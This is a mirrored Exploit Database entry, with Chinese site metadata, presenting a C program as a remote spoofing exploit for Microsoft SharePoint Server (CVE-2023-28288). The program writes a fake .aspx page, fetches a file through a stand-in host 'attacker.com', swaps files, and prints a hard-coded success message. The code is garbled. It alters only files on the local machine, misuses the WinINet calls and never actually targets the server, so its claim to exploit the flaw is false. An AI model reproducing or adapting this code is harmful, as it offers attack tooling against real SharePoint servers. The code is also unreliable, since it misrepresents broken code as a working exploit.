Microsoft SharePoint Enterprise Server 2016 – Spoofing

• Exploit Database
• 119 阅读

• 作者： Amirhossein Bahramizadeh
  日期： 2023-06-26
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/51543/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155

  // Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing // Date: 2023-06-20 // country: Iran // Exploit Author: Amirhossein Bahramizadeh // Category : Remote // Vendor Homepage: // Microsoft SharePoint Foundation 2013 Service Pack 1 // Microsoft SharePoint Server Subscription Edition // Microsoft SharePoint Enterprise Server 2013 Service Pack 1 // Microsoft SharePoint Server 2019 // Microsoft SharePoint Enterprise Server 2016 // Tested on: Windows/Linux // CVE : CVE-2023-28288   #include <windows.h> #include <stdio.h>     // The vulnerable SharePoint server URL const char *server_url = "http://example.com/";   // The URL of the fake SharePoint server const char *fake_url = "http://attacker.com/";   // The vulnerable SharePoint server file name const char *file_name = "vuln_file.aspx";   // The fake SharePoint server file name const char *fake_file_name = "fake_file.aspx";   int main() { HANDLE file; DWORD bytes_written; char file_contents[1024];   // Create the fake file contents sprintf(file_contents, "<html><head></head><body><p>This is a fake file.</p></body></html>");   // Write the fake file to disk file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if (file == INVALID_HANDLE_VALUE) { printf("Error creating fake file: %d\n", GetLastError()); return 1; } if (!WriteFile(file, file_contents, strlen(file_contents), &bytes_written, NULL)) { printf("Error writing fake file: %d\n", GetLastError()); CloseHandle(file); return 1; } CloseHandle(file);   // Send a request to the vulnerable SharePoint server to download the file sprintf(file_contents, "%s%s", server_url, file_name); file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if (file == INVALID_HANDLE_VALUE) { printf("Error creating vulnerable file: %d\n", GetLastError()); return 1; } if (!InternetReadFileUrl(file_contents, file)) { printf("Error downloading vulnerable file: %d\n", GetLastError()); CloseHandle(file); return 1; } CloseHandle(file);   // Replace the vulnerable file with the fake file if (!DeleteFile(file_name)) { printf("Error deleting vulnerable file: %d\n", GetLastError()); return 1; } if (!MoveFile(fake_file_name, file_name)) { printf("Error replacing vulnerable file: %d\n", GetLastError()); return 1; }   // Send a request to the vulnerable SharePoint server to trigger the vulnerability sprintf(file_contents, "%s%s", server_url, file_name); if (!InternetReadFileUrl(file_contents, NULL)) { printf("Error triggering vulnerability: %d\n", GetLastError()); return 1; }   // Print a message indicating that the vulnerability has been exploited printf("Vulnerability exploited successfully.\n");   return 0; }   BOOL InternetReadFileUrl(const char *url, HANDLE file) { HINTERNET internet, connection, request; DWORD bytes_read; char buffer[1024];   // Open an Internet connection internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0); if (internet == NULL) { return FALSE; }   // Connect to the server connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0); if (connection == NULL) { InternetCloseHandle(internet); return FALSE; }   // Send the HTTP request request = HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0); if (request == NULL) { InternetCloseHandle(connection); InternetCloseHandle(internet); return FALSE; } if (!HttpSendRequest(request, NULL, 0, NULL, 0)) { InternetCloseHandle(request); InternetCloseHandle(connection); InternetCloseHandle(internet); return FALSE; }   // Read the response data while (InternetReadFile(request, buffer, sizeof(buffer), &bytes_read) && bytes_read > 0) { if (file != NULL) { // Write the data to disk if (!WriteFile(file, buffer, bytes_read, &bytes_read, NULL)) { InternetCloseHandle(request); InternetCloseHandle(connection); InternetCloseHandle(internet); return FALSE; } } }   InternetCloseHandle(request); InternetCloseHandle(connection); InternetCloseHandle(internet); return TRUE; }